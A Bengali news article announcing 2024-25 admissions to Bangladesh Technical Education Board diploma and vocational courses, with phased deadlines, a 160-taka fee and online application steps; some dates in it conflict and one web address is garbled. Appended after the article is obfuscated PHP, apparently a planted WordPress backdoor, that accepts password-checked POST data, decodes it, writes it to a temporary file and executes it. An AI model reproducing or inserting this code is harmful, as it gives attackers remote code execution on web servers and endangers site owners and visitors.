কারিগরির ৪ বছরের ডিপ্লোমা, ২ বছরের বিএমটি, এইচএসসি (ভোক) কোর্সে ভর্তি বিজ্ঞপ্তি প্রকাশ


শিক্ষা সংবাদ প্রকাশের সময় : মে ২৯, ২০২৪, ১০:৫৭ অপরাহ্ণ /
কারিগরির ৪ বছরের ডিপ্লোমা, ২ বছরের বিএমটি, এইচএসসি (ভোক) কোর্সে ভর্তি বিজ্ঞপ্তি প্রকাশ
0Shares

কারিগরি শিক্ষা বোর্ডের আওতাধীন সব সরকারি ও বেসরকারি শিক্ষাপ্রতিষ্ঠানের (পলিটেকনিক ইনস্টিটিউট) ২০২৪-২৫ শিক্ষাবর্ষের ভর্তি আবেদন শুরু হয়েছে। এসএসসি ও সমমানের পরীক্ষায় উত্তীর্ণ শিক্ষার্থীরা এতে আবেদন করতে পারবেন। প্রথম ধাপের আবেদন চলবে ২৫ জুন পর্যন্ত। বাংলাদেশ কারিগরি শিক্ষা বোর্ড ভর্তি-সংক্রান্ত বিজ্ঞপ্তিতে বলা হয়েছে, এবার তিন ধাপে ভর্তিতে আবেদন করার সুযোগ পাবে শিক্ষার্থীরা।

কারিগরি বোর্ডের বিজ্ঞপ্তিতে বলা হয়েছে, ২৬ মে থেকে ২০২৪-২৫ শিক্ষাবর্ষের চার বছর মেয়াদি ডিপ্লোমা-ইন-ইঞ্জিনিয়ারিং, ডিপ্লোমা-ইন-মেরিন ইঞ্জিনিয়ারিং, ডিপ্লোমা-ইন-টেক্সটাইল ইঞ্জিনিয়ারিং, ডিপ্লোমা-ইন-অ্যাগ্রিকালচার, ডিপ্লোমা-ইন-ফরেষ্ট্রি, ডিপ্লোমা-ইন-ফিশারিজ, ডিপ্লোমা-ইন-লাইভস্টক এবং দুই বছর মেয়াদি এইচএসসি ( বিএমটি-বিজনেস ম্যানেজমেন্ট অ্যান্ড টেকনোলজি), এইচএসসি (ভোকেশনাল), ডিপ্লোমা-ইন-কমার্স ও সার্টিফিকেট-ইন-মেরিন ট্রেড কোর্স শিক্ষাক্রমে ভর্তি কার্যক্রম শুরু হয়েছে। ভর্তি আবেদন অনলাইনে পূরণ করে ১৬২ টাকা ফি জমা দিতে হবে। এর মধ্য ১৬০টা আবেদন ফি ও মোবাইল অপারেটর ফি ২ টাকা।

আবেদন ও ভর্তি নিশ্চায়নের সময়সীমা :

প্রথম পর্যায়: প্রথম পর্যায়ের আবেদন ২৬ মে থেকে শুরু হয়ে চলবে ২৫ জুন পর্যন্ত। এ পর্যায়ে ভর্তি নিশ্চায়ন করতে হবে আগামী ১ থেকে ৫ জুলাইয়ের মধ্যে।

দ্বিতীয় পর্যায়: দ্বিতীয় পর্যায়ে আগামী ৯ জুলাই আবেদন শুরু হয়ে চলবে ১১ জুলাই পর্যন্ত। এ পর্যায়ে ভর্তি নিশ্চায়নের তারিখ ১৫ থেকে ১৮ জুলাই।

তৃতীয় পর্যায়: দ্বিতীয় পর্যায়ে আবেদন শুরু হবে আগামী ২২ জুলাই থেকে। ২৫ জুলাই পর্যন্ত চলবে আবেদন। এ পর্যায়ে ভর্তি নিশ্চায়নের তারিখ ২৯ জুলাই।

চার বছর মেয়াদি কোর্স সমূহ :

চার বছর মেয়াদি ডিপ্লোমা-ইন-ইঞ্জিনিয়ারিং/টেক্সটাইল/কৃষি/ফিশারিজ এবং দুই বছর মেয়াদি এইচএসসি (বিএমটি), এইচএসসি (ভোকেশনাল), ডিপ্লোমা-ইন-কমার্স ও সার্টিফিকেট-ইন-মেরিন ট্রেড কোর্সে।

আবেদনের সময় :

২৬ মে থেকে আবেদন শুরু হবে। আবেদন চলবে আগামী ৮ আগস্ট পর্যন্ত (রাত ৯টা পর্যন্ত)।

আবেদন করার নিয়ম : 

আবেদনকারীকে বাংলাদেশ কারিগরি শিক্ষা বোর্ডের www.bteb.gov.bd, htbd, www.btebadmission.gov.bdhttp://www.btebadmission.gov.bd বা সংশ্লিষ্ট প্রতিষ্ঠানের ওয়েবসাইটের নির্ধারিত আবেদন ফরমে আবেদন করতে হবে।

আবেদনপত্রের সব তথ্য যথাযথভাবে পূরণ করে সদ্য তোলা পাসপোর্ট সাইজের রঙিন ছবি আপলোড করতে হবে।

অনলাইন পেমেন্ট গেটওয়ে ব্যবহার করে ১৬০ টাকা আবেদন ফি জমা দিতে হবে।

ক্লাস শুরুর তারিখ :

এই শিক্ষাবর্ষে ক্লাস শুরুর সম্ভাব্য তারিখ আগামী ১১ আগস্ট।

0Shares
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}